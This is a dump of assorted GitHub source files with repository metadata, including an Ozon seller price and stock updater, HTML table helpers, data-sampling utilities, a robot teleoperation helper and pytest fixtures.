some_prod.get(\"total\")\n last_id = some_prod.get(\"last_id\")\n if total == len(product_list):\n break\n offer_ids = []\n for product in product_list:\n offer_ids.append(product.get(\"offer_id\"))\n return offer_ids\n\n\ndef update_price(prices: list, client_id, seller_token):\n \"\"\"Обновить цены товаров.\n\n Делает API-запрос на сайт озон. 
Для корректного запроса необходим идентификатор клиента, идентификатор продавца,\n список с ценами\n\n Аргументы:\n prices (list): Список с ценами.\n client_id (str): Идентификатор клиента.\n seller_token (str): Идентификатор продавца.\n\n Возвращаемое значение:\n Ответ от сайта в json формате\n\n Пример корректного исполнения функции:\n Корректный ответ от сайта озон - 200 и получение ответа в json формате\n\n Пример некорректного исполнения функции:\n Корректный ответ от сайта озон - 400\n\n \"\"\"\n url = \"https://api-seller.ozon.ru/v1/product/import/prices\"\n headers = {\n \"Client-Id\": client_id,\n \"Api-Key\": seller_token,\n }\n payload = {\"prices\": prices}\n response = requests.post(url, json=payload, headers=headers)\n response.raise_for_status()\n return response.json()\n\n\ndef update_stocks(stocks: list, client_id, seller_token):\n \"\"\"Обновить остатки.\n\n Делает API-запрос на сайт озон. Для корректного запроса необходим идентификатор клиента,\n идентификатор продавца и список с остатками.\n\n Аргументы:\n stocks (list): Список с остатками.\n client_id (str): Идентификатор клиента.\n seller_token (str): Идентификатор продавца.\n\n Возвращаемое значение:\n Ответ от сайта в json формате\n\n Пример корректного исполнения функции:\n Корректный ответ от сайта озон - 200 и получение ответа в json формате\n\n Пример некорректного исполнения функции:\n Корректный ответ от сайта озон - 400\n\n \"\"\"\n url = \"https://api-seller.ozon.ru/v1/product/import/stocks\"\n headers = {\n \"Client-Id\": client_id,\n \"Api-Key\": seller_token,\n }\n payload = {\"stocks\": stocks}\n response = requests.post(url, json=payload, headers=headers)\n response.raise_for_status()\n return response.json()\n\n\ndef download_stock():\n \"\"\"Скачать файл ostatki с сайта casio.\n\n Скачивает и распаковывает архив с сайта casio. Остатки хранятся в таблице формата .xls.\n Из файла берет столбец с остатками товара и записывает в словарь.\n После всего удаляет файл, скаченный ранее с сайта\n\n Возвращаемое значение:\n Словарь с остатками товара\n\n Пример корректного исполнения функции:\n Заполненный словарь\n\n Пример некорректного исполнения функции:\n Пустой словарь\n\n \"\"\"\n # Скачать остатки с сайта\n casio_url = \"https://timeworld.ru/upload/files/ostatki.zip\"\n session = requests.Session()\n response = session.get(casio_url)\n response.raise_for_status()\n with response, zipfile.ZipFile(io.BytesIO(response.content)) as archive:\n archive.extractall(\".\")\n # Создаем список остатков часов:\n excel_file = \"ostatki.xls\"\n watch_remnants = pd.read_excel(\n io=excel_file,\n na_values=None,\n keep_default_na=False,\n header=17,\n ).to_dict(orient=\"records\")\n os.remove(\"./ostatki.xls\") # Удалит�� файл\n return watch_remnants\n\n\ndef create_stocks(watch_remnants, offer_ids):\n \"\"\"Создать запасы.\n\n Создает пустой список для записи запасов.\n В цикле по остаткам, которые вернула функция download_stock() с сайта Casio, проверяются,\n если количество товара больше 10 то запас 100,\n если количество товара 1 то запаса нет. 
Иначе запас равен количеству товара.\n В зависимости от условий список запасов пополняется артикулом и количеством товара.\n Также в цикле по предложениям в список запасов добавляется предложение без запаса.\n\n Аргументы:\n watch_remnants (dict): Словарь с остатками.\n offer_ids (list): Список товаров магазина.\n\n Возвращаемое значение:\n Список с запасами товара\n\n Пример корректного исполнения функции:\n Заполненный список\n\n Пример некорректного исполнения функции:\n Пустой список\n\n \"\"\"\n # Уберем то, что не загружено в seller\n stocks = []\n for watch in watch_remnants:\n if str(watch.get(\"Код\")) in offer_ids:\n count = str(watch.get(\"Количество\"))\n if count == \">10\":\n stock = 100\n elif count == \"1\":\n stock = 0\n else:\n stock = int(watch.get(\"Количество\"))\n stocks.append({\"offer_id\": str(watch.get(\"Код\")), \"stock\": stock})\n offer_ids.remove(str(watch.get(\"Код\")))\n # Добавим недостающее из загруженного:\n for offer_id in offer_ids:\n stocks.append({\"offer_id\": offer_id, \"stock\": 0})\n return stocks\n\n\ndef create_prices(watch_remnants, offer_ids):\n \"\"\"Создать цену.\n\n Создает пустой список для записи цены.\n В цикле по остаткам, которые вернула функция download_stock().\n Цена будет установлена в том случае, если в списке предложений найдется код товара из списка остатков.\n\n Аргументы:\n watch_remnants (dict): Словарь с остатками.\n offer_ids (list): Список товаров магазина.\n\n Возвращаемое значение:\n Список с ценами товара\n\n Пример корректного исполнения функции:\n Заполненный список\n\n Пример некорректного исполнения функции:\n Пустой список\n\n \"\"\"\n prices = []\n for watch in watch_remnants:\n if str(watch.get(\"Код\")) in offer_ids:\n price = {\n \"auto_action_enabled\": \"UNKNOWN\",\n \"currency_code\": \"RUB\",\n \"offer_id\": str(watch.get(\"Код\")),\n \"old_price\": \"0\",\n \"price\": price_conversion(watch.get(\"Цена\")),\n }\n prices.append(price)\n return prices\n\n\ndef price_conversion(price: str) -> str:\n \"\"\"Преобразовать цену.\n\n Отрезает от строки с ценой дробную часть и оставляет в целой части только цифры.\n\n Аргументы:\n price (str): Цена.\n\n Возвращаемое значение:\n Строка целой части числа без лишних знаков и валюты.\n\n Пример корректного исполнения функции:\n 5'990.00 руб. -> 5990\n\n Пример некорректного исполнения функции:\n 2'530.00 руб. 
-> .00 руб\n\n \"\"\"\n\n return re.sub(\"[^0-9]\", \"\", price.split(\".\")[0])\n\n\ndef divide(lst: list, n: int):\n \"\"\"Разделить список lst на части по n элементов.\n\n Отрезает от строки с ценой дробную часть и оставляет в целой части только цифры.\n\n Аргументы:\n lst (list): Список, который необходимо разделить.\n n (int): с каким шагом необходимо разделить.\n\n Возвращаемое значение:\n Сп��сок разделенный на части с установленным шагом.\n\n Пример корректного исполнения функции:\n Список разделен на части с установленным шагом\n\n Пример некорректного исполнения функции:\n Список разделен на части с не установленным шагом или пуст\n\n \"\"\"\n for i in range(0, len(lst), n):\n yield lst[i : i + n]\n\n\nasync def upload_prices(watch_remnants, client_id, seller_token):\n \"\"\"Обновить цену.\n\n Получает от функции get_offer_ids() список товара.\n Получает от функции create_prices() список с ценами товара.\n Разделяет в цикле цену с шагом 1000 и получает от функции update_price() ответ в json формате\n\n Аргументы:\n watch_remnants (dict): Словарь с остатками.\n client_id (str): Идентификатор клиента.\n seller_token (str): Идентификатор продавца.\n\n Возвращаемое значение:\n Обновленный список с ценами\n\n Пример корректного исполнения функции:\n В списке обновились цены на товар\n\n Пример некорректного исполнения функции:\n В списке старые цены на товар\n\n \"\"\"\n offer_ids = get_offer_ids(client_id, seller_token)\n prices = create_prices(watch_remnants, offer_ids)\n for some_price in list(divide(prices, 1000)):\n update_price(some_price, client_id, seller_token)\n return prices\n\n\nasync def upload_stocks(watch_remnants, client_id, seller_token):\n \"\"\"Обновить остатки.\n\n Получает от функции get_offer_ids() список товара.\n Получает от функции create_stocks() список с остатками товара.\n Разделяет в цикле цену с шагом 100 и получает от функции update_price() ответ в json формате\n\n Аргументы:\n watch_remnants (dict): Словарь с остатками.\n client_id (str): Идентификатор клиента.\n seller_token (str): Идентификатор продавца.\n\n Возвращаемое значение:\n Обновленный список с остатками товара и список товара на который есть запас\n\n Пример корректного исполнения функции:\n В списке обновились остатки товара\n\n Пример некорректного исполнения функции:\n В списке ничего не изменилось\n\n \"\"\"\n offer_ids = get_offer_ids(client_id, seller_token)\n stocks = create_stocks(watch_remnants, offer_ids)\n for some_stock in list(divide(stocks, 100)):\n update_stocks(some_stock, client_id, seller_token)\n not_empty = list(filter(lambda stock: (stock.get(\"stock\") != 0), stocks))\n return not_empty, stocks\n\n\ndef main():\n env = Env()\n seller_token = env.str(\"SELLER_TOKEN\")\n client_id = env.str(\"CLIENT_ID\")\n try:\n offer_ids = get_offer_ids(client_id, seller_token)\n watch_remnants = download_stock()\n # Обновить остатки\n stocks = create_stocks(watch_remnants, offer_ids)\n for some_stock in list(divide(stocks, 100)):\n update_stocks(some_stock, client_id, seller_token)\n # Поменять цены\n prices = create_prices(watch_remnants, offer_ids)\n for some_price in list(divide(prices, 900)):\n update_price(some_price, client_id, seller_token)\n except requests.exceptions.ReadTimeout:\n print(\"Превышено время ожидания...\")\n except requests.exceptions.ConnectionError as error:\n print(error, \"Ошибка соединения\")\n except Exception as error:\n print(error, \"ERROR_2\")\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"morozgit/seller-apis","sub_path":"seller.py","file_name":"seller.py","file_ext":"py","file_size_in_byte":16696,"program_lang":"python","lang":"ru","doc_type":"code","dataset":"github-code","pt":"95"} +{"seq_id":"20056354665","text":"nterms = int(input(\"terms?\"))\nn1,n2 = 0,1\ncount = 0\nif nterms <=0:\n print(\"don't be a larry [:)\")\nelif nterms == 1:\n print (n1)\nelse:\n while count < nterms:\n print(n1)\n nth = (n1 + n2)/0\n n1 = n2\n n2 = nth\n count += 1\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"InstructorNigel/hello","sub_path":"whatever 10.py","file_name":"whatever 10.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"25486948262","text":"\"\"\"\nThis started from a copy of FHTML.py from Fernanda Ostrovski in June 2016\nIt is based on a version of HTML from Sophie Reed. The current version\nof HTML.py from Sophie has a creation date of 20150116\n\n\nWe might want to explore the use of:\n\n https://pypi.python.org/pypi/html\n\n or pandas html i/o or astropy html i/o\n\n\"\"\"\n\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport numpy as np\n\n\ndef table(term_list, header_list, nan=None,\n links=(False, 0, [])):\n \"\"\"\n create a html table\n\n Needs a way to define how to deal with NANs so they can be sorted.\n\n \"\"\"\n\n debug = False\n\n print(\"running function:\", __name__)\n print('type(term_list)', type(term_list))\n print('type(term_list[0])', type(term_list[0]))\n print('type(term_list[0][0])', type(term_list[0][0]))\n print('Number of rows:', len(term_list))\n print('type(header_list)', type(header_list))\n print('type(header_list[0])', type(header_list[0]))\n print('Number of column fields:', len(header_list))\n\n lines = \"\"\n\n # rgm added anchor support \n # where anchor is the row number ID as a string\n # a url of the form base_url#ID then takes you to the row you want.\n\n irow = -1\n for term in term_list:\n\n irow = irow + 1\n n = 0\n p = term_list.index(term)\n\n while n < len(term):\n\n # print('type(term[n])', type(term[n]))\n\n if term[n].find('nan') >= 0:\n if debug:\n print(\"Found a 'nan':\", n, term[n])\n print(\"Found a 'nan':\", term)\n if nan is not None:\n term[n] = '-99'\n\n if (links[0] is True) and (links[1] == n):\n file = str(links[2][p]) + \".html\"\n st = link(file, str(term[n]))\n\n else:\n st = str(term[n])\n\n if n == 0:\n line = \"\" + '' \\\n + str(p + 1) + '' + \\\n '' + \\\n \"\" + st + \"\"\n elif n == len(term) - 1:\n line += \"\" + st + \"\\n\"\n else:\n line += \"\" + st + \"\"\n\n n += 1\n\n lines += line\n\n heads = \"\"\n n = 0\n while n < len(header_list):\n head = header_list[n]\n if n == 0:\n heads += '\\n' \\\n + '\\n' \\\n + '\"\n elif n == len(header_list) - 1:\n heads += \"\\n\\n\"\n else:\n heads += \"\"\n\n n += 1\n\n lines = heads + lines + \"\\n\\n
ID ' \\\n + head + \"\" + head + \"
\" + head + \"
\"\n\n if len(term_list) == 0:\n print(\"No values to turn into table\")\n return\n else:\n return lines\n\n\ndef image(im_file):\n \"\"\"\n create image link\n \"\"\"\n\n im_line = \"\"\n return im_line\n\n\ndef link(link_add, link_text):\n \"\"\"\n create link\n \"\"\"\n link_line = \"\" + link_text + \"\"\n return link_line\n\n\ndef cutout_page(link_path, link_add, cutout_files, info, RA_main):\n \"\"\"\n create cutout page\n \"\"\"\n f = open(link_path + link_add, \"w\")\n lines = \"\"\n\n for (i, j) in info:\n if i == RA_main:\n l = info.index((i, j))\n line = str(i) + \": \" + str(j) + \"
\"\n lines += line\n\n lines += wise_url(info[l][1], info[l + 1][1]) + \"
\"\n lines += ned_url(info[l][1], info[l + 1][1]) + \"
\"\n lines += sdss_url(info[l][1], info[l + 1][1]) + \"
\"\n lines += dr9_url(info[l][1], info[l + 1][1]) + \"
\"\n lines += dr12_url(info[l][1], info[l + 1][1]) + \"
\"\n for cutout_file in cutout_files:\n print(cutout_file)\n lines += \"
\" + \"
\" + str(cutout_file) + \"
\" \\\n + image(cutout_file) + \"
\" + \"

:: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Intended Audience :: System Administrators',\n 'Intended Audience :: Developers'\n ]\n)\n\n","repo_name":"leonmeguira/automation-for-radware","sub_path":"ansible/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"39145041204","text":"from random import sample\nfrom numpy import unique, random\nimport pandas as pd\nfrom pandas import cut\n\ndef balanced_sample_maker(X, y, random_seed=None):\n \"\"\" return a balanced data set by oversampling minority class\n current version is developed on assumption that the positive\n class is the minority.\n\n Parameters:\n ===========\n X: {numpy.ndarrray}\n y: {numpy.ndarray}\n \"\"\"\n uniq_levels = unique(y)\n uniq_counts = {level: sum(y == level) for level in uniq_levels}\n\n if not random_seed is None:\n random.seed(random_seed)\n\n # find observation index of each class levels\n groupby_levels = {}\n for ii, level in enumerate(uniq_levels):\n obs_idx = [idx for idx, val in enumerate(y) if val == level]\n groupby_levels[level] = obs_idx\n\n # oversampling on observations of positive label\n sample_size = uniq_counts[0]\n over_sample_idx = random.choice(groupby_levels[1], size=sample_size, replace=True).tolist()\n balanced_copy_idx = groupby_levels[0] + over_sample_idx\n random.shuffle(balanced_copy_idx)\n\n return X[balanced_copy_idx, :], y[balanced_copy_idx]\n \n \ndef stratified_sample_maker(x, size, k=10, is_return_index=False):\n \"\"\" binning continuous variable and conduct stratified sampling\n \n Parameters:\n ==========\n * x: {vector-like}\n * size: integer, size of samples\n * k: integer, the number of bins to cut continous variable \n * is_return_index: boolean, \n True, sampled instance's index in x\n False, returned sample instance index\n \"\"\"\n \n # detect if x is categorical variables \n inst_x = x[0]\n if isinstance(inst_x, (int, float)):\n if isinstance(inst_x, int):\n uniq_x = list(set(x))\n if len(uniq_x) < 0.2 * len(x):\n is_number = False\n else:\n is_number = True\n else:\n is_number = True\n else: \n is_number = False\n \n # bininig continuous variable\n if is_number:\n probs = np.linspace(0, 1, k+1, endpoint=True)\n cut_points = pd.Series(x).quantile(probs).tolist()\n cut_labels = [i for i in range(k)]\n x_bins = cut(x, bins=cut_points, labels=cut_labels)\n else:\n cut_labels = list(set(x))\n x_bins = x\n \n # calcualte the observed probabilties\n vc_df = pd.Series(x_bins).value_counts()\n cut_labels = vc_df.index.tolist()\n obs_probs = (vc_df / sum(vc_df)).tolist()\n cum_size = 0\n cum_prob = 0\n\n sample_bin_size = []\n for ii, obs_prob in enumerate(obs_probs):\n if ii < len(cut_labels)-1:\n sb_size = round(size * obs_prob, 0)\n cum_size += sb_size\n cum_prob += obs_prob\n else:\n sb_size = size - cum_size\n cum_size += sb_size\n cum_prob += obs_prob\n sample_bin_size.append(int(sb_size))\n \n # generate samples\n sample_index = []\n for ii, (cut_label, bin_samp_size) in enumerate(zip(cut_labels, sample_bin_size)):\n pool = [i for i, xb in enumerate(x_bins) if xb == cut_label]\n samples = sample(pool, k=bin_samp_size)\n sample_index = sample_index + samples\n \n if is_return_index:\n return sample_index \n else:\n return [x[i] for i in sample_index]\n 
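# Illustrative usage of stratified_sample_maker (hypothetical data). Note that
# the continuous branch above calls np.linspace, so alongside the
# `from numpy import unique, random` at the top this module would also need
# `import numpy as np` for that path to run:
#   ages = [23, 35, 31, 47, 52, 28, 39, 44, 61, 27, 33, 58]
#   subsample = stratified_sample_maker(ages, size=6, k=3)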
","repo_name":"beingzy/ds_toolbox","sub_path":"ds_toolbox/Sampler.py","file_name":"Sampler.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"33065530913","text":"def createH33Header(size,width,inputfilename,outputfilename):\n fid = open(outputfilename,'w');\n\n sizex=size[0]\n sizey=size[1]\n sizez=size[2]\n\n widthx=width[0]\n widthy=width[1]\n widthz=width[2]\n\n # Base\n\n base = '!INTERFILE :=\\n' + \\\n 'name of data file := %s\\n'+\\\n '!GENERAL DATA :=\\n'+\\\n '!GENERAL IMAGE DATA :=\\n'+\\\n '!type of data := PET\\n'+\\\n 'imagedata byte order := LITTLEENDIAN\\n'+\\\n '!PET STUDY (General) :=\\n'+\\\n '!PET data type := Image\\n'+\\\n 'process status := Reconstructed\\n'+\\\n '!number format := float\\n'+\\\n '!number of bytes per pixel := 4\\n'+\\\n 'number of dimensions := 3\\n'+\\\n 'matrix axis label [1] := x\\n'+\\\n '!matrix size [1] := %d\\n'+\\\n 'scaling factor (mm/pixel) [1] := %g\\n'+\\\n 'matrix axis label [2] := y\\n'+\\\n '!matrix size [2] := %d\\n'+\\\n 'scaling factor (mm/pixel) [2] := %g\\n'+\\\n 'matrix axis label [3] := z\\n'+\\\n '!matrix size [3] := %d\\n'+\\\n 'scaling factor (mm/pixel) [3] := %g\\n'+\\\n '!number of slices := %d\\n'+\\\n 'slice thickness (pixels) := %g\\n'+\\\n 'number of time frames := 1\\n'+\\\n '!END OF INTERFILE :=\\n'\n\n fid.write(base % (inputfilename,sizex,widthx,sizey,widthy,sizez,widthz,sizez,widthz));\n\n fid.close();\n return","repo_name":"NottingDuck/Project-UCL-ZHENYA_YAN","sub_path":"Code/Density_Image/CreateHeader.py","file_name":"CreateHeader.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"7546076655","text":"#!/usr/bin/env python\n\n\"\"\" Modul obstarava pripojeni k jednotlivym typum zarizeni Linux, Mikrotik a vytvari Generic device\nz tech zarizeni ke kterym se neumi pripojit \"\"\"\n\nimport logging\nfrom multiprocessing.dummy import Pool\nimport tqdm\nimport scanobjects\nimport netobjects\nimport linux\nimport mikrotik\nfrom tools import save_object\n\n\n# Nastavi logovani\nLOGGER = logging.getLogger(__name__)\n\n\nclass Connect:\n \"\"\" Trida rozdeli podle typu zarizeni a provede nacteni jejich konfigurace \"\"\"\n\n def __init__(self, scan_net: scanobjects.ScanNetwork):\n self.scan_net = scan_net\n self.network = netobjects.Network(scan_net.net_name)\n self.linux_dev = list()\n self.mikrotik_dev = list()\n self.generic_dev = list()\n self.sort_devices()\n self.connect_mikrotik()\n self.connect_linux()\n self.get_generic_objects()\n\n def sort_devices(self):\n \"\"\" Rozdeli zarizeni podle typu \"\"\"\n\n for dev in self.scan_net.ip_objects_active:\n if dev.operating_system == 'Linux':\n self.linux_dev.append(dev)\n elif dev.operating_system == 'RouterOS':\n self.mikrotik_dev.append(dev)\n else:\n self.generic_dev.append(dev)\n\n def save_network(self):\n \"\"\" Ulozi objekt sit do souboru \"\"\"\n\n save_object(self.network, self.scan_net.net_name+'_network.pkl')\n\n def connect_linux(self):\n \"\"\" Nacte Linux zarizeni \"\"\"\n\n def connect(ip_obj: scanobjects.IpScan) -> linux.Linux:\n return linux.Linux(ip_obj, self.scan_net.accounts, self.network)\n\n hlp_list = list()\n pool = Pool(52) # Vytvori pool o danem poctu vlaken\n # Vytvori Linux objekty z daneho seznamu IpObjektu a zobrazi progress bar\n text = 'Analyzing Linux'\n for item in tqdm.tqdm(pool.imap_unordered(connect, self.linux_dev),\n 
total=len(self.linux_dev), desc=text, unit='device'):\n hlp_list.append(item)\n pool.close() # Udelame poradek\n pool.join()\n count = 0\n count_dupl = 0\n count_generic = 0\n for dev in hlp_list:\n if dev.device:\n # Pokud zarizeni uz nebylo nacteno, protoze ma vice IP tak ho oznaci jako duplikat\n if dev.device.uid not in self.network.get_uid_list():\n # Pridame zarizeni k nactenym zarizenim\n self.network.add_device(dev.device)\n count += 1\n # Pridame zarizeni do seznamu duplikatu\n else:\n self.network.add_duplicate_device(dev.device)\n count_dupl += 1\n # Pokud se nepodarilo pripojit, tak dame zarizeni do generic\n else:\n self.generic_dev.append(dev.ip_obj)\n count_generic += 1\n self.save_network()\n print('')\n print('Saved {} linux devices.'.format(count))\n print('{} linux devices was duplicate.'.format(count_dupl))\n print('{} linux devices was unconectable and moved to generic devices.'.format(\n count_generic))\n print('')\n\n def connect_mikrotik(self):\n \"\"\" Nacte Mikrotik zarizeni \"\"\"\n\n def connect(ip_obj: scanobjects.IpScan) -> mikrotik.Mikrotik:\n return mikrotik.Mikrotik(ip_obj, self.scan_net.accounts, self.network)\n\n hlp_list = list()\n pool = Pool(26) # Vytvori pool o danem poctu vlaken\n # Vytvori Linux objekty z daneho seznamu IpObjektu a zobrazi progress bar\n text = 'Analyzing Mikrotik'\n for item in tqdm.tqdm(pool.imap_unordered(connect, self.mikrotik_dev),\n total=len(self.mikrotik_dev), desc=text, unit='device'):\n hlp_list.append(item)\n pool.close() # Udelame poradek\n pool.join()\n count = 0\n count_dupl = 0\n count_generic = 0\n for dev in hlp_list:\n if dev.device:\n # Pokud zarizeni uz nebylo nacteno, protoze ma vice IP tak ho oznaci jako duplikat\n if dev.device.uid not in self.network.get_uid_list():\n # Pridame zarizeni k nactenym zarizenim\n self.network.add_device(dev.device)\n count += 1\n # Pridame zarizeni do seznamu duplikatu\n else:\n self.network.add_duplicate_device(dev.device)\n count_dupl += 1\n # Pokud se nepodarilo pripojit, tak dame zarizeni do generic\n else:\n self.generic_dev.append(dev.ip_obj)\n count_generic += 1\n self.save_network()\n print('')\n print('Saved {} mikrotik devices.'.format(count))\n print('{} mikrotik devices was duplicate.'.format(count_dupl))\n print('{} mikrotik devices was unconectable and moved to generic devices.'.format(\n count_generic))\n print('')\n\n def get_generic_objects(self):\n \"\"\" Z IpObjektu ze kterych neumime dostat data udelame GenericDevice objekty \"\"\"\n\n for obj in tqdm.tqdm(self.generic_dev, total=len(self.generic_dev),\n desc='Adding devices', unit='device'):\n # for obj in self.generic_dev:\n dev_obj = netobjects.GenericDevice()\n dev_obj.ipaddr = obj.ipaddr\n dev_obj.operating_system = obj.operating_system\n dev_obj.os_info = obj.os_info\n dev_obj.device = obj.device\n dev_obj.device_info = obj.device_info\n dev_obj.active = obj.active\n dev_obj.pingable = obj.pingable\n dev_obj.min = obj.min\n dev_obj.avg = obj.avg\n dev_obj.max = obj.max\n dev_obj.loss = obj.loss\n dev_obj.active_ports = obj.active_ports\n self.network.add_device(dev_obj)\n self.save_network()\n print('')\n print('Saved {} generic devices.'.format(len(self.generic_dev)))\n print('')\n","repo_name":"slesta/NetMon","sub_path":"connectobject.py","file_name":"connectobject.py","file_ext":"py","file_size_in_byte":6023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"71677078392","text":"import toml\nimport json\nimport time\nimport os\n\ndirname = 
os.path.dirname(__file__)\nconfig_filename = os.path.join(dirname, 'config_remote.toml')\nconfig_data = toml.load(config_filename)\nbutton_map = config_data['button_map_kuka']\n\n\nclass KukaDrive(object):\n def __init__(self):\n self.move = []\n \n def update_axis_arm(self, command, event_axis=1):\n if event_axis == 1:\n if command > 0:\n self.move = [\"down\"]\n\n elif command <= 0:\n self.move = [\"up\"]\n elif event_axis == 0:\n if command > 1e-3:\n self.move = [\"right\"]\n\n elif command < 1e-3:\n self.move = [\"left\"]\n\n def update_button_arm(self, button):\n\n if button == button_map['up']:\n self.move = [\"up\"]\n \n elif button == button_map['down']:\n self.move = [\"down\"]\n\n elif button == button_map['left']:\n self.move = [\"left\"]\n \n elif button == button_map['right']:\n self.move = [\"right\"]\n \n def reset_command(self):\n self.move = []\n\n def get_commands(self): \n return self.move\n \n\n\n \n","repo_name":"artparkindia/teleoperations","sub_path":"Ros2/teleops/kuka_drive.py","file_name":"kuka_drive.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"23922247817","text":"# Refaça o DESAFIO 051, lendo o primeiro termo e a razão de uma PA,\n# mostrando os 10 primeiros termos usando a estrurura while.\n\nprint('{}{:↔^40}{}\\n'.format('\\033[7m', ' EX 61 ', '\\033[m'))\nprint('{}{:↔^40}{}\\n'.format('\\033[7;1;35m', ' PROGRESSÃO ARITMÉTICA v2.0 ', '\\033[m'))\n\ntermo = int(input('1º termo: '))\nrazao = int(input('Razão: '))\nc = 2\n\nprint('{}'.format('↔'*28))\nwhile c < 11:\n print('{:2}º termo: {:2}'.format(c, termo+razao))\n termo += razao\n c += 1","repo_name":"GabrielRRodrigues/CursoemVideo_Python","sub_path":"Exercícios/ex061.py","file_name":"ex061.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"34652160295","text":"# Дан список:\n# ['в', '5', 'часов', '17', 'минут', 'температура', 'воздуха', 'была', '+5', 'градусов']\n# Необходимо его обработать — обособить каждое целое число (вещественные не трогаем) кавычками (добавить кавычку до и \n# кавычку после элемента списка, являющегося числом) и дополнить нулём до двух целочисленных разрядов:\n\nlist1 = ['в', '5', 'часов', '17', 'минут', 'температура', 'воз��уха', 'была', '+5', 'градусов']\nprint(list1)\n\nlenght: int = len(list1)\nstore_id = id(list1)\nfor i in range(lenght):\n entity = list1.pop(0)\n if entity.isdigit():\n list1.append(F'\"{int(entity):02d}\"')\n elif entity[0] == \"+\" and entity[1].isdigit():\n list1.append(F'\"+{int(entity):02d}\"')\n else:\n list1.append(entity)\nprint(' '.join(list1))","repo_name":"Alex-24x7/Pyton","sub_path":"Lesson 6/DZ6/DZ6_1.py","file_name":"DZ6_1.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"10668324677","text":"\nclass TrainingInstance:\n \"\"\" A single model-training instance. Contains:\n A model\n A set of hyperparameters\n A dataset. 
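    Illustrative construction (hypothetical model/data objects, argument
    names as in __init__ below): TrainingInstance(my_model, my_data_source,
    {"lr": 1e-3})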
\n    def __init__(self, model, data_source, hyperparameters):\n        from .utils import Log\n        self.model = model\n        self.data_source = data_source\n        self.hyperparameters = hyperparameters\n        self.log = Log(hyperparameters=self.hyperparameters)\n","repo_name":"briantimar/batchml","sub_path":"batchml/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"27087086741","text":"import time\nimport holidays\n\ndef isValidTime( unixTimestamp ):\n    # returns TRUE if the current day is a weekday\n    # AND the current time is after 8 AM HST and before 6 PM HST\n    # AND the current day isn't a government holiday\n    # returns FALSE otherwise\n\n    currTime = time.localtime( unixTimestamp )\n\n    # check if the current day isn't a weekday\n    # MONDAY = 0, SATURDAY = 5, SUNDAY = 6\n    weekday = currTime.tm_wday\n    if weekday >= 5:\n        print(\"Today isn't a weekday\")\n        return False\n\n    # check if the current time is before 8 AM or after 6 PM\n    # 8 AM when hour = 8 -> time is 8:XX AM\n    # 6 PM when hour = 18 -> time is 6:XX PM\n    hour = currTime.tm_hour\n    if hour < 8 or hour >= 18:\n        print(\"The current hour isn't during normal work hours!\")\n        return False\n\n    # check if the current day is a holiday\n    hawaii_holidays = holidays.country_holidays('US', subdiv='HI')\n    if unixTimestamp in hawaii_holidays:\n        print(\"Today is a holiday!\")\n        return False\n\n    return True\n","repo_name":"UHM-SCADA-Lab/SDN","sub_path":"rules/time_rule.py","file_name":"time_rule.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"25157291450","text":"import pytest\nfrom flask import testing\nfrom werkzeug.datastructures import Headers\n\nfrom app import create_app\nfrom app.extensions import db\nfrom config import TestingConfig\nfrom tests.factories import UserFactory\n\nTEST_API_KEY = \"11111111-1111-1111-1111-111111111111\"\n\n\n@pytest.fixture(name=\"application\")\ndef fixture_application():\n    \"\"\"Fixture to set up application with configuration.\n\n    Yields:\n        application -- Application context\n    \"\"\"\n    app = create_app(TestingConfig)\n    flaskapp = app.app\n\n    with flaskapp.app_context(), flaskapp.test_request_context():\n        db.drop_all()\n        db.create_all()\n        yield flaskapp\n\n\n@pytest.fixture(name=\"client\")\ndef fixture_client(application):\n    \"\"\"Fixture for HTTP test client.\n\n    Arguments:\n        application -- Application context\n\n    Yields:\n        client -- HTTP client\n    \"\"\"\n    with application.test_client() as c:\n        yield c\n\n\n@pytest.fixture(name=\"user\")\n@pytest.mark.usefixtures(\"application\")\ndef fixture_user():\n    yield UserFactory(email=\"testuser@email.com\", api_key=TEST_API_KEY)\n\n\nclass TestClient(testing.FlaskClient):\n    def open(self, *args, **kwargs):\n        api_key_headers = Headers({\"X-Api-Key\": self.user.api_key})\n        headers = kwargs.pop(\"headers\", Headers())\n        headers.extend(api_key_headers)\n        kwargs[\"headers\"] = headers\n        return super().open(*args, **kwargs)\n\n\n@pytest.fixture(name=\"auth_client\")\ndef fixture_auth_client(application, user):\n    \"\"\"Fixture for an authenticated HTTP test client.\n\n    Arguments:\n        application -- Application context fixture\n        user -- API user fixture\n\n    Yields:\n        client -- Authenticated client\n    \"\"\"\n    TestClient.user = user\n    application.test_client_class = TestClient\n    with application.test_client() as c:\n        yield 
